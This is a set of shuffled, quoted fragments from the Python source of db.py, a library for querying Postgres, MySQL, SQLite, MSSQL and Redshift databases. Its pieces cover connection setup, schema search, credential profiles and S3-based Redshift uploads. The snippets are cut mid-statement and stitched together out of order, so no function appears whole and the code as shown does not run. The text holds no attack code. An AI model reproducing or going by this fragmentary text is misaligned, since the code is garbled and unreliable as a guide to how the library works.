keys_per_column: int, None Default number of keys to display in", "This will take a second...\") rows_to_insert = [] tables = [row[0] for row", "Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if", "<NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME>", "of schemas to include. Defaults to all. profile: str Preconfigured database credentials /", "+-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer | SupportRepId |", "any new tables and columns. \"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables =", "def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a file.", "and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],", "Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those About To", "None Default number of keys to display in the foreign and reference keys.", "Let's Get It Up 1 1 7 8 Inject The Venom 1 1", "{} # pull out column metadata for all tables as list of tuples", "sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table,", "None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an environment", "tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def", "sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql)", "| +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that are varchars", "hostname: str Hostname your database is running on (i.e. 
\"localhost\", \"10.20.1.248\") port: int", "0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99", "foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\"", "rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars templates. This", "if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or", "not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema)", "database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler()", "| Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee", "import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL = False", "profile is not None: pass else: raise Exception(\"Database type not specified! Must select", "table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None):", "q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database", "your database's schema again and looks for any new tables and columns. 
\"\"\"", "s3 argument is a prefix, so it'll pick up # all of the", "False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try:", "\\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1", "Track | TrackId | INTEGER | | Track | AlbumId | INTEGER |", "Evil Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME>", "5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if", "# second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys", "= driver if self.dbtype is None: raise Exception(\"Database type not specified! Must select", "grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys, you", "0 For Those About To Rock We Salute You 1 Balls to the", "names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar,", "InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist", "cache # 2. use a single query for getting all key relationships #", "Three modes for refreshing schema # 1. load directly from cache # 2.", "driver=None, cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\":", "del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for a given profile. 
Profiles", "is installed\") self.con = sqlite.connect(self.filename) self.cur = self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not", "NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer | CustomerId", "StringIO # Python 2.7 except: from io import StringIO # Python 3.3+ import", "tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print (\"Error executing", "for item in data] query = [str(item) for item in query] if union==True:", "-------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db", "raise Exception(\"Couldn't find sqlite library. Please ensure it is installed\") self.con = sqlite.connect(self.filename)", "= [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t)", "have 2 slices per node, so if running 2 nodes you will want", "match your redshift cluster's region. Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature", "dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass", "(column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in", "import S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if boto", "run the \\COPY statment. 
# # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in", "search: str glob pattern for what you're looking for data_type: str, list (optional)", "profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f:", "= q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return", "in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name)", "NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress", "def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self):", "returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") # returns all", "and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],", "s3=False): \"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if", "Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json, dump_to_json", "1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes", "what you're looking for data_type: str, list (optional) specify which data type(s) you", "INTEGER | | Genre | GenreId | INTEGER | | Invoice | InvoiceId", "no limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None", "redshift: 5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite", "so you don't have to save them in script. Parameters ---------- profile: str", "data frame you want to save to the db drop_if_exists: bool (False) whether", "that you'll have verrrrrrrry wide columns in some cases. 
driver: str, None Driver", "+--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>>", "HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure", "True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite", "to be viable... -= if not, there's always a random issue where rows", "AlbumId MediaTypeId \\ 0 1 For Those About To Rock (We Salute You)", "\"\"\" Query your database with a raw string. Parameters ---------- q: str Query", "| Track | GenreId | INTEGER | | Track | Bytes | INTEGER", "templates. This will return any handlebars queries as a single data frame. limit:", "6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title,", "t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql:", "4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8", "all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables", "column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM", "sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1", "U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D...", "INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type,", "HAS_PG: raise Exception(\"Couldn't find psycopg2 library. 
Please ensure it is installed\") self.con =", "variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific", "| | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all", "NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY", "You Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99", "Artist 275 2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}}", "u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres',", "import uuid import re import os import sys from collections import defaultdict import", "InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | Track", "be viable... -= if not, there's always a random issue where rows are", "= True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name,", "u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user):", "not in the same order, making doctest fail. db.find_column(\"Name\") # returns all columns", "Exception(\"Couldn't find sqlite library. 
Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur", "2 2 3 Fast As a Shark 3 2 3 4 Restless and", "= self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate", "and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username =", "= True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True", "varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}',", "<BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name", "8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes", "{'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite', u'hostname': u'localhost', u'password': None, u'port': 5432,", "= pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables =", "| INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack |", "3.3+ import uuid import re import os import sys from collections import defaultdict", "one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL", "to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER", "\"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your database's schema", "| | Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId |", "new tables and columns. 
\"\"\" col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta)", "the bucket_location to default. # we can't do this in the function definition", "elif isinstance(data, dict): query = template(data) query = str(query) else: return q return", "\"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True,", "attach to each table to the table name in dict for (table_schema, table_name,", "of the data*.gz files we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql", "\\ 0 For Those About To Rock We Salute You 1 Balls to", "db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column", "or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur", "(We Salute You) 1 1 1 2 Balls to the Wall 2 2", "Examples -------- >>> from db import DemoDB >>> db = DemoDB() >>> q", "we're going to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\")", "use an S3 object print_sql: bool (False) option for printing sql statement that", "+-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre | Name |", "f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those", "as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with", "on a.AlbumId = t.AlbumId; ... 
''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ...", "in the function definition because we're # lazily importing boto only if necessary", "Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\") if s3: f", "bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please ensure it", "profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from", "libraries # TODO: maybe add warnings? try: import psycopg2 as pg HAS_PG =", "__import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\",", "threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if", "nodes have 2 slices per node, so if running 2 nodes you will", "return Examples -------- >>> from db import DemoDB >>> db = DemoDB() >>>", "1. load directly from cache # 2. 
use a single query for getting", "specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket =", "any metatables (at least ones that fit into our framework), so we're going", "\"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str", "\"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") #", "approach if use_cache: # generate our Tables, and load them into a TableSet", "database profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname':", "bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name)", "None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {}", "= limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None: raise", "limit=None): \"\"\" Query your database with a raw string. Parameters ---------- q: str", "q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3,", "\"select top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q,", "nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key.", "1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1", "| Track | Milliseconds | INTEGER | | Track | GenreId | INTEGER", "available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype':", "(That's right, you'll be limitless. Bradley Cooper style.) 
keys_per_column: int, None Default number", "Those About To Rock We Salute You 1 1 2 Balls to the", "is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library. Please", "\"dw\", \"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\",", "| Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER | |", "0 Album 347 1 Artist 275 2 Track 3503 >>> q = '''", "1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5", "= [row[0] for row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table", "self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise Exception(\"Couldn't find sqlite library.", "sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name,", "if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None,", "name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet self._tables", "bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self):", "variables s3: S3 alternative to using keys, you can use an S3 object", "\"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables =", "dbtype==\"mssql\": port = 1433 elif profile is not None: pass else: raise Exception(\"Database", "You 6 For Those About To Rock We Salute You 7 For Those", "... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\",", "6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed", "a specific AWS location in which to create the temporary transfer s3 bucket.", "present, set the bucket_location to default. 
# we can't do this in the", "will probably stop your little sister from stealing your passwords. Parameters ---------- profile:", "and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try:", "| Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | |", "| | Track | AlbumId | INTEGER | | Track | MediaTypeId |", "except ImportError: HAS_ODBC = False try: import pymssql HAS_PYMSSQL = True except ImportError:", "creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column')", "according to amazon, this is # much faster when it comes time to", "int Number of records to return Examples -------- >>> from db import DemoDB", "foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql) in", "self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename", "for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value =", "[] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self,", "returns all tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\"", "rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute(\"drop table if", "self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile)", "S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i,", "TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql + \"\\n\") 
self._try_command(sql) # generate schema", "({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit: q", "275 2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ...", "to redshift via s3. Parameters ---------- name: str name for your shiny new", "is running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running", "| CustomerId | INTEGER | | Employee | EmployeeId | INTEGER | |", "with a raw string. Parameters ---------- q: str Query string to execute data:", "1 Balls to the Wall 0.99 2 Fast As a Shark 0.99 3", "| +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address", "| NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns containing Address that", "a ... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ...", "mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\")", "| GenreId | INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+", "t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref", "s3 bucket. This should match your redshift cluster's region. Examples -------- \"\"\" if", "to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY", "specific AWS location in which to create the temporary transfer s3 bucket. 
This", "to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict representation.\"\"\" db_dict", "\"\"\" SQLite doesn't come with any metatables (at least ones that fit into", "row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}',", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the", "not find file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not", "INTEGER | | Track | MediaTypeId | INTEGER | | Track | Milliseconds", "Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as", "the Wall 2 2 2 3 Fast As a Shark 3 2 3", "| Album | ArtistId | INTEGER | | Artist | ArtistId | INTEGER", "username for the database password: str Your password for the database hostname: str", "a column. Parameters ----------- search: str glob pattern for what you're looking for", "= pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif", "fail. db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column", "arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\":", "self.hostname self.con = pymssql.connect(host=hostname, user=self.username, password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([])", "does not exist. 
Could not find file {1}\".format(name, f)) os.remove(f) except Exception as", "self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in", "4 Let There Be Rock 1 4 5 Big Ones 3 \"\"\" if", "arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg =", "key. if this is None, the function will try and grab AWS_SECRET_KEY from", "raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username,", "---------- >>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+", "EmployeeId | INTEGER | | Genre | GenreId | INTEGER | | Invoice", "shiny new table df: DataFrame data frame you want to save to the", "<NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99", "function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your", "table if it already exists chunk_size: int (10000) Number of DataFrame chunks to", "handlebars queries as a single data frame. limit: int Number of records to", "| Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70)", "the Chinook DB See http://chinookdatabase.codeplex.com/ for more info. \"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook", "see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df) chunks =", "it comes time to run the \\COPY statment. 
# # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering", "path to sqlite database dbname: str Name of the database schemas: list List", "keys_per_column: int, None Default number of keys to display in the foreign and", "IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\")", "= db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\")", "argument for handlebars-queries. Data will be passed to the template and rendered using", "sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for foreign keys self.cur.execute(\"drop", "necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't", "}}' as table_name, ... COUNT(*) as cnt ... FROM ... {{ name }}", "INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols = []", "tables as list of tuples if told to use cached metadata if use_cache", "for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. 
Please wait...\")", "\"prod\") from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\",", "Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\")", "DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album |", "\"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username and", "= profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if", "again and looks for any new tables and columns. \"\"\" col_meta, table_meta =", "print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters ----------", "table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach", "for foreign keys self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar,", "the database properties to your db.py profile.\"\"\" if len(self.tables) > 0: f =", "INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId", ".column import Column, ColumnSet from .table import Table, TableSet from .s3 import S3", "| +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ | Table |", "tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your database's", "'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\")", "import MySQLdb mysql_connect = MySQLdb.connect 
HAS_MYSQL = True except ImportError: try: import pymysql", "self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through", "not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of", "DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\",", "1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from", "the function definition because we're # lazily importing boto only if necessary here.", "s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. Parameters", "= creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column =", "3 4 Let There Be Rock 1 4 5 Big Ones 3 \"\"\"", "name: str name for your shiny new table df: DataFrame data frame you", "format as list of tuples, to match how normal loading is performed for", "| Artist | Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120)", "convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the", "# attempt to import the relevant database libraries # TODO: maybe add warnings?", "is not to say this a secure way to store sensitive data, but", "6 For Those About To Rock We Salute You 7 For Those About", "| TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | |", "GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None", "+ \"\\n\") self._try_command(sql) self.con.commit() # perform the \\COPY here. the s3 argument is", "import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False try:", "argument or as an environment variable `AWS_SECRET_KEY`\") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way", "libraries. 
Please ensure one of them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format(", "The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename)", "method. You can override it by adding limit={X} to the `query` method, or", "os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables:", "exists tmp_dbpy_schema;\") self.cur.execute(\"create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);\") for row", "| INTEGER | | Employee | EmployeeId | INTEGER | | Employee |", "4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860", "return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database", "profiles def remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user", "% (i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\")", "the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a", "row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column", "profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db import", "Wall 2 